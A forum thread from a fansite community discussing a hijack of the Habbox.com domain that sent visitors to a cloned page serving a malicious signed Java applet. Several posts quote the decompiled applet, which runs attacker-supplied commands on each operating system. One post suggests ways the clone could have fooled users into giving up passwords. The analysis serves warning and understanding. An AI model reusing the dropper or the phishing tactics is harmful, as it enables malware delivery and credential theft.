Hi,

So just sort of confuesed at the minuite with this annoucement;
http://www.habboxforum.com/showthread.php?t=750209
Which says;

We are currently aware of the problems people are facing with Habbox.com. If you go to the website and you get a Java Warning then DO NOT RUN the java or EXE application under any circumstances.

We recommend EVERYONE resets their passwords for any services that use the same password as their Habbox.com account and to reset their Habbox.com passwords once we give the go ahead after regaining control of the domain.

Update (22:41): We have suspended the Habbox.com website while we deal with the situation.

Update (23:14): We are currently working with Namecheap to try and resolve the issue. The issue is with the Habbox.com DNS information and NO information has been leaked from our servers or databases unless you put your information into the site during this time.

Update (00:41): Whilst normally a second person would have access to the domain accounts, it has been rather unfortunate timing and as such we are currently waiting for news from Sierk.

Update (11:08): We have made contact with Sierk and anticipate Habbox coming back online soon.


Pretty much it runs a exe file into your pc, guess that's extremely dangerous but how did this all happen, how did Habbox get so badly comprimised. You said you were working with NameCheap to resolve the issue, what issue?
Ross

Read the second update in that post...

Basically they managed to convince Namecheap to point the habbox.com domain elsewhere... someone made a clone of the Habbox.com site on their own server (and did a terrible job, tbh).

Read the second update in that post...

What he said, I'll quote it so you can see it clearly:


Update (23:14): We are currently working with Namecheap to try and resolve the issue. The issue is with the Habbox.com DNS information and NO information has been leaked from our servers or databases unless you put your information into the site during this time.

Read the second update in that post...


The issue is with the Habbox.com DNS information and NO information has been leaked from our servers or databases unless you put your information into the site during this time.


Hardly explain's anything?

Hardly explain's anything?

Basically they managed to convince Namecheap to point the habbox.com domain elsewhere... someone made a clone of the Habbox.com site on their own server (and did a terrible job, tbh).

Im sure this has happened before, actually im really sure this has happened before. How the hell are namecheap believing this crap, Im fairly sure this should be taken to court, its up to Jin at the end of the day but that's terreble security.

So your domain provider basically let a stranger change the DNS? Wow.

Im sure this has happened before, actually im really sure this has happened before. How the hell are namecheap believing this crap, Im fairly sure this should be taken to court, its up to Jin at the end of the day but that's terreble security.

The domains are still owned by Sierk, not Jin which is why it is taking some time to regain complete control of the DNS servers.


So your domain provider basically let a stranger change the DNS? Wow.

Pretty much.

Bit crazy how namecheap allowed this to happen, i'd expect a misunderstanding like this to come from a smaller site etc, but a huge site like NameCheap... bit disapointing. As i said i thought this happened before, surely there is a way to prevent this from happening e.g To get your password back for your NameCheap account you can attach a home phone number or something?!

Bit crazy how namecheap allowed this to happen, i'd expect a misunderstanding like this to come from a smaller site etc, but a huge site like NameCheap... bit disapointing. As i said i thought this happened before, surely there is a way to prevent this from happening e.g To get your password back for your NameCheap account you can attach a home phone number or something?!

It's not quite as simple as that. With Sierk still having control of the domains it took some time for Jin to get hold of him. Thankfully he has managed to do so now. I'd anticipate the domain being back in Sierks control at some point this afternoon. If Jin had ownership it wouldn't have taken so long as we are in easy contact with him.

The Namecheap account hasn't been compromised... Jin normally has access but doesn't at the moment, hence we have to wait for Sierk to give Jin the details.

how in the world did it get to that. I also feel bad for those who only visit the site, click run and then might get a virus. Not gooooood

So if the namecheap account hasn't been comprimised how on earth did NameCheap fall for giving it to another NameCheap account? like what the hell?

how in the world did it get to that. I also feel bad for those who only visit the site, click run and then might get a virus. Not gooooood

We'll make sure to get an announcement up when we get the site back and running.


So if the namecheap account hasn't been comprimised how on earth did NameCheap fall for giving it to another NameCheap account? like what the hell?

This, this is a very good question and one that we have been asking all night.

Not going to lie, now you've made me feel pretty scared about my domains on NameCheap. I'll defiantly be bringing up a way to prevent this, or totally leave NameCheap myself.

So if the namecheap account hasn't been comprimised how on earth did NameCheap fall for giving it to another NameCheap account? like what the hell?

That's it. Basically how can we rely on NameCheap if they so easily give out accounts. Unless they had overwhelming evidence of proof.

That's it. Basically how can we rely on NameCheap if they so easily give out accounts. Unless they had overwhelming evidence of proof.

Don't really care how much proof he had, Should be phone line support or something similar considering this is such a big sector in the IT Development domain's are everything

Are the domains going to be transferred to another provider?

Are the domains going to be transferred to another provider?

Thing is, in my eyes i can't see much other way to protect them moving provider. I think namecheap & godaddy are defiantly the biggest but im completely confused how this happened still. Wonder what information the "hacker" gave

Do we know if the hacker was a habbox member or a staff member etc. I didn't realise it was that big security risk and it is sods law that Jin didn't have access yet.

Do we know if the hacker was a habbox member or a staff member etc. I didn't realise it was that big security risk and it is sods law that Jin didn't have access yet.

Got news from FBI it's someone called Samanfa, but were working on it for u.
Prob was a insider to be fair, all depends on what information they had, quite a lot of it was most likely public anyways. I mean it's not hard to find Sierk's name, Address, email etc. Wonder what else they had

Do we know if the hacker was a habbox member or a staff member etc. I didn't realise it was that big security risk and it is sods law that Jin didn't have access yet.

At this point we're trying to find out who changed the DNS. No one except Sierk and Jin had legal access to the accounts and unfortunately Jin doesn't have the access right now.

At this point we're trying to find out who changed the DNS. No one except Sierk and Jin had legal access to the accounts and unfortunately Jin doesn't have the access right now.

Just to add on, we expect it to be back to normal later today. Sierk has been reached.

what happened to the down page

http://www.mattgarner.net/upload/images/2012/06/04/kgou3.png
Seems downpage is back to this, *******s trying to hack me

http://www.mattgarner.net/upload/images/2012/06/04/kgou3.png
Seems downpage is back to this, *******s trying to hack me

The downpage would only stay up whilst your ISP's DNS hadn't changed. Now it's been so many hours nearly everyone's DNS will have updated, hence you all getting directed to that site with the Java exploit. Just don't click run ;)

The downpage would only stay up whilst your ISP's DNS hadn't changed. Now it's been so many hours nearly everyone's DNS will have updated, hence you all getting directed to that site with the Java exploit. Just don't click run ;)
Well i had the Habbox downpage a bit earlier now this is back on, tried clicking Hall of fame to see myself but it wanted to take me to some gaming market site :( n course i wouldn't click run my names not babyg 8-)

Well i had the Habbox downpage a bit earlier now this is back on, tried clicking Hall of fame to see myself but it wanted to take me to some gaming market site :( n course i wouldn't click run my names not babyg 8-)

I also wouldn't click it, Im not stupid!

I also wouldn't click it, Im not stupid!

http://chzmemeanimals.files.wordpress.com/2012/02/advice-animals-memes-first-world-cat-problems-red-dot.jpg

So is Habbox going to move name servers?

http://chzmemeanimals.files.wordpress.com/2012/02/advice-animals-memes-first-world-cat-problems-red-dot.jpg

So is Habbox going to move name servers?

I think they need to assess first how it came to be that the nameservers were allowed to be changed.

I'm suddenly glad the domains I own that I care about are registered with go daddy. If they changed the name servers then it's possible they manipulated email accounts. It could be a good idea to contact Sulake (if it's not already even done of course) and specifically tell them to ignore any recent emails they received from Habbox.

Sierk should switch to SimplexWebs

Also isn't there an option so lock down transfers to the point that namecheap couldn't move it about even if they wanted to?

Sierk should switch to SimplexWebs

Also isn't there an option so lock down transfers to the point that namecheap couldn't move it about even if they wanted to?

or not...

Sierk should switch to SimplexWebs

Also isn't there an option so lock down transfers to the point that namecheap couldn't move it about even if they wanted to?Isn't Simplex managed by people who use Habbo forums? If one of them happen to have some sort of grudge against Habbox then err.. :P

Isn't Simplex managed by people who use Habbo forums? If one of them happen to have some sort of grudge against Habbox then err.. :P

Yeh in a way clubhabbo people, recusion is part of their staff tho

---------- Post added 04-06-2012 at 02:27 PM ----------

Please make it so this is dismissable;

HABBOX.COM ISSUES: Please visit THIS THREAD (http://www.habboxforum.com/showthread.php?t=750209) for more information.
I've read it a few times, ether way it won't make much of a difference to me :( let me dismiss

yeah i agree, should of made it dismissable soon as they put the notice up but mattg wouldn't for some reason, after seeing it 300 times I still have no more interest in it than I did the 5th time I seen it.

and i somewhat highly doubt namecheap would change the DNS without the user accessing the account, as for someone to email with all of sierks info and say hi im sierk change my DNS, they'd simply tell him to log into the namecheap account or reset the information for it otherwise it kind of ruins the point of having a namecheap account if you can transfer etc through customer support.

and i fail to see how it's such a huge problem with trust issues with them, in the 8 years or whatever habbox has been with namecheap it's happened once (if it even did, fairly sure last time sierks account got compromised on namecheap and no-one blamed the company). If you're not completely inactive and that happened to your domain (which i'm assuming is nowhere near as 'popular' as habbox for anyone to want to go to that trouble) you'd be able to change the DNS almost instantly instead of waiting 10 hours to get a hold of the owner.

just get sierk to check last login when he goes on namecheap...

Conspiracy theory. Sierk created a new server, pointed the dns to the new server so he could hack all of our habbo accounts as habbox is running low on funds :P lol jk that's impossible mattg hogs all the furni ;l


On a serious note, question namecheap on how it happened. Ask them to put a note on the account so if anything like this happens again namecheap staff won't give in so easily (if that was the case). Either way, they shouldn't of been so stupid.

So, since everything is down, DJ's are not to DJ? :S Plus, I tried going to it and my AVG blocked a threat.

So, since everything is down, DJ's are not to DJ? :S Plus, I tried going to it and my AVG blocked a threat.

Good luck on trying not to DJ;
http://habboxlive.com/
Everythings up except Hx.com.


Plus, I tried going to it and my AVG blocked a threat.
Because there's a virus on there (if you accept the .exe)

I didn't get offered an .exe ; I x'ed off asap.

AVG most likely blocked it for you, the site's not very interesting to be fair. no pages work :( tried going through them all

I tried looking at the events. I need to know if there is any events going on. :P

Yeh that's defiantly not possible as the habbox.com domain is messed atm, well is for my provider may not be for yours

I tried looking at the events. I need to know if there is any events going on. :P

It would be best to look at the community notice board in regards of events! :P

It's actually pretty easy to get on the main site if you really need it for some reason http://146.185.20.107/#!/Home

whoever it is his name is phil

whoever it is his name is phil
Dilusionate; what you been doing to Habbox? :P

I've been looking into the Java popup used on their site.

It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.

A further problem made 10x worse by Habbox's owners being inactive, how many times to people need to say it GIVE xxMATTGxx ACCESS TO THE LOT.

There is no java exploit. Here is the decompiled code:



import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
public void init()
{
String window1 = getParameter("windows1");
String windows2 = getParameter("windows2");
String linux1 = getParameter("linux1");
String linux2 = getParameter("linux2");
String unix1 = getParameter("unix1");
String unix2 = getParameter("unix2");
String os = System.getProperty("os.name").toLowerCase();


if (os.indexOf("win") >= 0)
{
try
{
Process w1 = Runtime.getRuntime().exec(window1);
w2 = Runtime.getRuntime().exec(windows2);
}
catch (IOException e)
{
Process w2;
e.printStackTrace();
}


}


if (os.indexOf("mac") >= 0)
{
try
{
Process u1 = Runtime.getRuntime().exec(unix1);
u2 = Runtime.getRuntime().exec(unix2);
}
catch (IOException e)
{
Process u2;
e.printStackTrace();
}


}


if (os.indexOf("lin") < 0) {
return;
}
try
{
Process l1 = Runtime.getRuntime().exec(linux1);
l2 = Runtime.getRuntime().exec(linux2);
}
catch (IOException e)
{
Process l2;
e.printStackTrace();
}
}
}


Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.


I've been looking into the Java popup used on their site.

It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.

I don't have any experience with Java, so it was a guess. From looking at the traffic these processes are using it's an IRC controlled botnet... could be wrong but that's what it seems like to me in my VM.


There is no java exploit. Here is the decompiled code:



import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
public void init()
{
String window1 = getParameter("windows1");
String windows2 = getParameter("windows2");
String linux1 = getParameter("linux1");
String linux2 = getParameter("linux2");
String unix1 = getParameter("unix1");
String unix2 = getParameter("unix2");
String os = System.getProperty("os.name").toLowerCase();


if (os.indexOf("win") >= 0)
{
try
{
Process w1 = Runtime.getRuntime().exec(window1);
w2 = Runtime.getRuntime().exec(windows2);
}
catch (IOException e)
{
Process w2;
e.printStackTrace();
}


}


if (os.indexOf("mac") >= 0)
{
try
{
Process u1 = Runtime.getRuntime().exec(unix1);
u2 = Runtime.getRuntime().exec(unix2);
}
catch (IOException e)
{
Process u2;
e.printStackTrace();
}


}


if (os.indexOf("lin") < 0) {
return;
}
try
{
Process l1 = Runtime.getRuntime().exec(linux1);
l2 = Runtime.getRuntime().exec(linux2);
}
catch (IOException e)
{
Process l2;
e.printStackTrace();
}
}
}


Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

There is no java exploit. Here is the decompiled code:



import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
public void init()
{
String window1 = getParameter("windows1");
String windows2 = getParameter("windows2");
String linux1 = getParameter("linux1");
String linux2 = getParameter("linux2");
String unix1 = getParameter("unix1");
String unix2 = getParameter("unix2");
String os = System.getProperty("os.name").toLowerCase();


if (os.indexOf("win") >= 0)
{
try
{
Process w1 = Runtime.getRuntime().exec(window1);
w2 = Runtime.getRuntime().exec(windows2);
}
catch (IOException e)
{
Process w2;
e.printStackTrace();
}


}


if (os.indexOf("mac") >= 0)
{
try
{
Process u1 = Runtime.getRuntime().exec(unix1);
u2 = Runtime.getRuntime().exec(unix2);
}
catch (IOException e)
{
Process u2;
e.printStackTrace();
}


}


if (os.indexOf("lin") < 0) {
return;
}
try
{
Process l1 = Runtime.getRuntime().exec(linux1);
l2 = Runtime.getRuntime().exec(linux2);
}
catch (IOException e)
{
Process l2;
e.printStackTrace();
}
}
}


Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.


Not sure if being pedantic or arguing for the sake of it.

But yeah, you get the jist of what Recursion said.

I'm not arguing. Just was pointing out that there is no Java exploit, which is hardly pedantic. It would be a lot more serious if there was some exploit that bypassed Java's security model. The way it is currently handled is how it is designed - the users needs to give explicit permission for anything bad to happen.


Not sure if being pedantic or arguing for the sake of it.

But yeah, you get the jist of what Recursion said.

whoever it is his name is phil


@Dilusionate (http://www.habboxforum.com/member.php?u=67954); what you been doing to Habbox? :P

HUH? D:

A further problem made 10x worse by Habbox's owners being inactive, how many times to people need to say it GIVE xxMATTGxx ACCESS TO THE LOT.

I'm actually not entirely sure what this is meant to achieve, Matt is hardly super server admin, sure he's more technically adept than most but stuff like that has never been the General Manager's responsibility. From what I've heard a lot of the past restrictions on access are being eased anyway but to say that Matt should have access to control Habbox's domain is insane. Jin is actually being more reachable recently than he has in the past and from what I understand Sierk was reachable for this also. Just because they're not making daily posts on the forum does not mean they're inactive.

There is no java exploit. Here is the decompiled code:



import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
public void init()
{
String window1 = getParameter("windows1");
String windows2 = getParameter("windows2");
String linux1 = getParameter("linux1");
String linux2 = getParameter("linux2");
String unix1 = getParameter("unix1");
String unix2 = getParameter("unix2");
String os = System.getProperty("os.name").toLowerCase();


if (os.indexOf("win") >= 0)
{
try
{
Process w1 = Runtime.getRuntime().exec(window1);
w2 = Runtime.getRuntime().exec(windows2);
}
catch (IOException e)
{
Process w2;
e.printStackTrace();
}


}


if (os.indexOf("mac") >= 0)
{
try
{
Process u1 = Runtime.getRuntime().exec(unix1);
u2 = Runtime.getRuntime().exec(unix2);
}
catch (IOException e)
{
Process u2;
e.printStackTrace();
}


}


if (os.indexOf("lin") < 0) {
return;
}
try
{
Process l1 = Runtime.getRuntime().exec(linux1);
l2 = Runtime.getRuntime().exec(linux2);
}
catch (IOException e)
{
Process l2;
e.printStackTrace();
}
}
}


Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.

Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites is also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could of just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could of had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff member's Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.

It is exorbitantly clear to me that whomever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.

Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here). I'm also going to confess that leading up to my resignation I spoke to (harassed for hours on end) Matt about talking to Jin in order to get Tom root access to the server. Though not helpful in a circumstance as this one, if (god forbid) a different hacking situation came up, Tom would be here, fully capable, of resolving the issue. Jin agreed to allow Tom such access and I'm not sure if he's still getting it but I believe it would be very beneficial in resolving a hacking situation, or with maintaining server uptime, or with just plain old having it to help him with web development.

Another interesting (sort of clever) security idea which would help in situations like this, would be to include a JavaScript file on each Habbox Domain hosted on a non Habbox website (for instance, since I'm fairly certain all/most Habbox websites use jQuery, and so it would be a good idea to include jQuery hosted on another domain entirely). This way, if the hacker is stupid like this one, when they rip the website it will still link to this third party JavaScript file which a Habbox developer could then simply stick a window.location in and create a *temporary* fix to the problem. This is also a good idea because I've looked at Habbox's Google Analytics before and I've seen and reported (causing them to be shut down), 3 other websites whom all stole interface designs from Habbox. Many thieves are careless and would leave these external JavaScript inclusions intact (especially ones innocent looking like an inclusion to jQuery), so this could be a very useful method of redirecting users back onto Habbox soil where they could read a message in big red letters to not allow the Java code to run.

I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

B&Q have a wonderful sale on at the moment - 50% off all garden tools. Perhaps we could all chip in, buy a load of shovels and we can dig a much deeper hole for Habbox to sit itself in :P

Alternatively, just hire a bus, storm Namecheap and leave no survivors - they're clearly too dumb to live if they change the details of a domain without hesitation. Pretty stupid of them, you demand a good quality service yet they chuck common sense to the wind and leave hundreds (assuming Habbox has hundreds of viewers these days) exposed to these sorts of exploits. I hope you get an apology -or demand a whipping seeing as how poorly they've handled the domains :/

This isn't doing Habbox any good - servers which seem to be enjoying some quiet, down time and now a domain which was carelessly changed to expose users to whatever these Java exploits are attempting to do. Feel sorry for whoever had to grovel to Jin and sierk.

I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I don't think you understand the (very much so) significance of protecting a) your userbase and b) your user's information.

The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.
Now now, you shouldn't criticise code in public.


Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites is also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could of just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could of had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff member's Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.

It is exorbitantly clear to me that whomever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.Anybody who is focusing their efforts on stealing a Habbo domain is obviously not a fantastic hacker otherwise they'd be going after higher priority targets who handle card data.


Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here). I believe Jin has control whenever his hard drive isn't broken and I believe Matt himself thinks he doesn't need major access to the domain apart from rare (And non-existant hopefully after this) events Matt can wait a day or two for Jin to sort stuff.


I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.
I find it hilarious that you kick up a massive fuss when you see a new member of staff breaking a small rule yet Habbox having their domain stolen and destroying user trust is "minor"

I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I'm not going to write loads back but anyone who believes this is minor needs to check on what actually happened in the first place.


B&Q have a wonderful sale on at the moment - 50% off all garden tools. Perhaps we could all chip in, buy a load of shovels and we can dig a much deeper hole for Habbox to sit itself in :P

Alternatively, just hire a bus, storm Namecheap and leave no survivors - they're clearly too dumb to live if they change the details of a domain without hesitation. Pretty stupid of them, you demand a good quality service yet they chuck common sense to the wind and leave hundreds (assuming Habbox has hundreds of viewers these days) exposed to these sorts of exploits. I hope you get an apology -or demand a whipping seeing as how poorly they've handled the domains :/

This isn't doing Habbox any good - servers which seem to be enjoying some quiet, down time and now a domain which was carelessly changed to expose users to whatever these Java exploits are attempting to do. Feel sorry for whoever had to grovel to Jin and sierk.

We was discussing in a skype chat if we should do a raid! (Joking ofc but all good fun) and any future problems with the server will be sorted out very quickly.

We was discussing in a skype chat if we should do a raid! (Joking ofc but all good fun) and any future problems with the server will be sorted out very quickly.
I bet you're being serious and are just saying it's a joke to appear innocent. Your secret is safe, happy slashing ;)

I don't think you understand the (very much so) significance of protecting a) your userbase and b) your user's information.

Oh, my dear, yes I do. Is playing "teen tech genius" to the few others who care enough to read in to your message protecting anything? No, it's feeding your ego. Perhaps you get off on exciting (not so clever) takeovers of sagging fansites for an antique online community. Maybe it's very thrilling for you to decide whether or not this can be considered an 'exploit' or not. I guess there is the possibility that when you can't get credibility on a forum dedicated to this sort of thing, it feels good to big up what you read about on a forum that hires staff who post in Spam asking for REP. I really can't be sure.

The point of my post is that the reaction to what happened was melodramatic and this thread is as well. It is not a big deal. It has been done and the userbase's information is safe as of now. There needn't be a sixty post analysis on who dare did this and how in the world they managed this evil plan. It's Habbox, get a grip.

I'm actually not entirely sure what this is meant to achieve, Matt is hardly super server admin, sure he's more technically adept than most but stuff like that has never been the General Manager's responsibility. From what I've heard a lot of the past restrictions on access are being eased anyway but to say that Matt should have access to control Habbox's domain is insane. Jin is actually being more reachable recently than he has in the past and from what I understand Sierk was reachable for this also. Just because they're not making daily posts on the forum does not mean they're inactive.

If Jin's more reachable now then that's fantastic, but if it's anything like it was last year then god help everyone. Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?

*snip*
It is sort of serious, DNS shouldn't be changed through simple e-mail communications. It seemed to of taken quite a long time to get it sorted, and you yourself have stated that it's not going to do Habbox any favours. I sense you're a bit fed up with all these problems appearing every other week, and have just given up caring :P


If Jin's more reachable now then that's fantastic, but if it's anything like it was last year then god help everyone. Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?
It would be nice if they could sell it off to a group of people who are passionate about the website and the community, but unfortunately life isn't that simple :P

If Jin's more reachable now then that's fantastic, but if it's anything like it was last year then god help everyone. Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?

In regards of the site not being back up, there is good reason and this explains it:


Update (21:55):

The nameservers have been corrected and are now pointing again to the Habbox server. The DNS should propagate totally within the next 24 hours and this does mean you won't be able to see the Habbox site straight away. It depends on how fast your DNS is.

While we wait for the DNS to propagate we will be keeping the downtime page up throughout the night and into tomorrow. The Habbox downtime page looks like the following:


http://mattgarner.net/upload/images/2012/06/04/tO9D7.png


As before, DO NOT run any Java files if they appear on the Habbox.com site. We will NEVER ask for something like that to be run on the Habbox.com website. We appreciate your patience during this time and we will be back very soon

Whether it's Matt or someone else (when I was around my argument was always for @Hoteluser to get full access to everything but y'know that can't happen now) it would be much easier for these kinds of situations. I mean, the site's still not back up - what's that about?Recursion is getting root access afaik.

Oh, my dear, yes I do. Is playing "teen tech genius" to the few others who care enough to read in to your message protecting anything? No, it's feeding your ego. Perhaps you get off on exciting (not so clever) takeovers of sagging fansites for an antique online community. Maybe it's very thrilling for you to decide whether or not this can be considered an 'exploit' or not. I guess there is the possibility that when you can't get credibility on a forum dedicated to this sort of thing, it feels good to big up what you read about on a forum that hires staff who post in Spam asking for REP. I really can't be sure.

The point of my post is that the reaction to what happened was melodramatic and this thread is as well. It is not a big deal. It has been done and the userbase's information is safe as of now. There needn't be a sixty post analysis on who dare did this and how in the world they managed this evil plan. It's Habbox, get a grip.

And I bet you would be one of the first in the queue of people complaining in the Feedback forum should our database have been leaked last night about how we should be more careful with your personal information. Funnily enough, Habbox may well be a kid's fansite or whatever, but (un)fortunately we're still bound by the various UK laws, still have a responsibility to protect our users and their information and also to continue providing a good service and not just disappear overnight, as many fansites do. If it wasn't for sites like Habbox or other projects I've been involved in, I wouldn't know nearly as much as I do now, technically, and certainly wouldn't be applying for the jobs I have been recently.

Believe me, I have far bigger and better things to be doing than sitting around here helping out Habbox in any way, but I choose to because I like to have input into these things and I've seen Habbox grow (almost) right from the beginning. My ego is already as big as I need it be, I don't need to put any effort into making it any bigger, thank you very much.

It is sort of serious, DNS shouldn't be changed through simple e-mail communications. It seemed to of taken quite a long time to get it sorted, and you yourself have stated that it's not going to do Habbox any favours. I sense you're a bit fed up with all these problems appearing every other week, and have just given up caring :P


It would be nice if they could sell it off to a group of people who are passionate about the website and the community, but unfortunately life isn't that simple :P

Well this was always going to be the issue... I just wonder how much longer Habbox would have lasted had Jin not become Co-Owner, yet even Jin is going to want to move on eventually


In regards of the site not being back up, there is good reason and this explains it:

Thanks

I'm not going to write loads back but anyone who believes this is minor needs to check on what actually happened in the first place.

If this is NameCheap's doing, then that is off-putting and something to be discussed. Involving Habbox in to it as if some bastion of gold has been broken in to and all of it was stolen is silly. Habbox is not important anymore if it ever could be considered that. Do let the traffic reports speak and not the people who still have their lives invested in a rusty endeavour. Even if NameCheap did this, I would bet they had a twit of a staff member behind this and the company will surely condemn what happened. I'm certain you can remember a few of the crazy staff members Habbox has had in the past who have done bad things. You've been here as long as I have. Habbox is nothing to sweat over in this case.

If this is NameCheap's doing, then that is off-putting and something to be discussed. Involving Habbox in to it as if some bastion of gold has been broken in to and all of it was stolen is silly. Habbox is not important anymore if it ever could be considered that. Do let the traffic reports speak and not the people who still have their lives invested in a rusty endeavour. Even if NameCheap did this, I would bet they had a twit of a staff member behind this and the company will surely condemn what happened. I'm certain you can remember a few of the crazy staff members Habbox has had in the past who have done bad things. You've been here as long as I have. Habbox is nothing to sweat over in this case.

In your own eyes Habbox may not be important but the site still has users, to a lot of us who work on this site (including me) we still think Habbox is an important site. The users information throughout Habbox is very important to keep safe, yes nothing has been stolen or leaked. But regardless of that, this isn't classed as "minor".

Recursion is getting root access afaik.

Yes, have just been told. How many years too late?

Oh, my dear, yes I do. Is playing "teen tech genius" to the few others who care enough to read in to your message protecting anything? No, it's feeding your ego. Perhaps you get off on exciting (not so clever) takeovers of sagging fansites for an antique online community. Maybe it's very thrilling for you to decide whether or not this can be considered an 'exploit' or not. I guess there is the possibility that when you can't get credibility on a forum dedicated to this sort of thing, it feels good to big up what you read about on a forum that hires staff who post in Spam asking for REP. I really can't be sure.

The point of my post is that the reaction to what happened was melodramatic and this thread is as well. It is not a big deal. It has been done and the userbase's information is safe as of now. There needn't be a sixty post analysis on who dare did this and how in the world they managed this evil plan. It's Habbox, get a grip.

